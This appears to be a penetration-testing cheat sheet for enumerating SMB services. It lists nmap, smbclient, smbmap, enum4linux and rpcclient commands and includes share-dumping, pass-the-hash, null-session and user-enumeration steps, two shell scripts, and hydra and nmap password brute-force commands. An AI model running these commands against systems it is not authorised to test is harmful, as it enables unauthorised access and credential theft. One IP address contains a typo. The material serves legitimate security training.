SMB Enumeration (Port 139, 445)

Quick Intro

• SMB stand for Server Message Block

• SMB allows you to share your resources to other computers over the network,

• There is 3 version of SMB,

  1. SMB1 version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version

  2. SMB2 reduced "chattiness" of SMB1. Guest access disabled by default

  3. SMB3 guest access disabled, uses encryption. Most secure.

• TCP port 139 is SMB over NetBios.

• TCP port 445 is SMB over Ip. This is newer version of SMB

List of SMB versions and corresponding Windows versions:

1. SMB1 – Windows 2000, XP and Windows 2003.

2. SMB2 – Windows Vista SP1 and Windows 2008

3. SMB2.1 – Windows 7 and Windows 2008 R2

4. SMB3 – Windows 8 and Windows 2012.

Nmap Scanning

nmap -n -v -Pn -p139,445 -sV 192.168.0.101

# Getting version information

nmap 192.168.0.101 --script=smb-enum*

nmap 192.168.0.101 --script=smb-vuln*

nmap 192.1688.0.101 --script=smb-os*

# Scan with NSE Scripts

List Available Shares

smbclient

smbclient -L \\\\192.168.1.101\\
# Will list all shares

smbclient -L \\$ip --option='client min protocol=NT1'
# if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"

smbclient //HOST/PATH -c 'recurse;ls'
# List all files recursly

smbmap

smbmap -H $ip
# Will list all shares with available permissions

smbmap -H $ip -R $sharename
# Recursively list dirs, and files

smbmap -u '' -p '' -H $ip 
smbmap -u guest -p '' -H $ip
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
# With credentials

Nmap

nmap --script smb-enum-shares -p 139,445 $ip

Connecting To Shares

smbclient \\\\192.168.1.101\\C$
or
smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'

smbclient \\\\192.168.1.101\\admin$ -U t-skid
# Connect with valid username and password 
# Specify username with -U

Downloading multi files

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# With smbclient

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
# Downloads a file in quiet mode

smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
# download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work

Enum4Linux

enum4linux -a $ip

enum4linux -u 'guest' -p '' -a $ip

Null session with rpcclient

Rpcclient is a Linux tool used for executing client-side MS-RPC functions. A null session is a connection with a samba or SMB server that does not require authentication with a password. Null sessions were enabled by default on legacy systems but have been disabled from Windows XP SP2 and Windows Server 2003. Nowadays it is not very common to encounter hosts that have null sessions enabled, but it is worth a try if you do stumble across one. The connection uses port 445.

rpcclient -U "" <ip>

# You will be asked for a password but leave it blank and press enter to continue.

Some important commands

rpcclient>srvinfo

rpcclient>enumdomusers

rpcclient>getdompwinfo

Enumerating users with IPC$

if IPC$ share is enabled , and have anonymous access we can enumerate users through lookupsid.py

lookupsid.py anonymous@10.10.215.206

Google to see if version is vulnerable

SAMBA 3.x-4.x #  vulnerable to linux/samba/is_known_pipename

SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename

smbver.sh

good script to use if none of scanner giving version for smb

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , Session Setup Andx Response and there you will find smb version :)

smbenum.sh

#!/bin/bash
# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
# SECFORCE - Antonio Quina
# All credits to Bernardo Damele A. G. <bernardo.damele@gmail.com> for the ms08-067_check.py script

IFACE="eth0"

if [ $# -eq 0 ]
    then
        echo "Usage: $0 <IP>"
        echo "eg: $0 10.10.10.10"
        exit
    else
        IP="$1"
fi

echo -e "\n########## Getting Netbios name ##########"
nbtscan -v -h $IP

echo -e "\n########## Checking for NULL sessions ##########"
output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
echo $output

echo -e "\n########## Enumerating domains ##########"
bash -c "echo 'enumdomains' | rpcclient $IP -U%"

echo -e "\n########## Enumerating password and lockout policies ##########"
polenum $IP

echo -e "\n########## Enumerating users ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt

echo -e "\n########## Enumerating Administrators ##########"
net rpc group members "Administrators" -I $IP -U%

echo -e "\n########## Enumerating Domain Admins ##########"
net rpc group members "Domain Admins" -I $IP -U%

echo -e "\n########## Enumerating groups ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP

echo -e "\n########## Enumerating shares ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP

echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
rm /tmp/$IP-users.txt

Brute Force SMB

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb	

nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv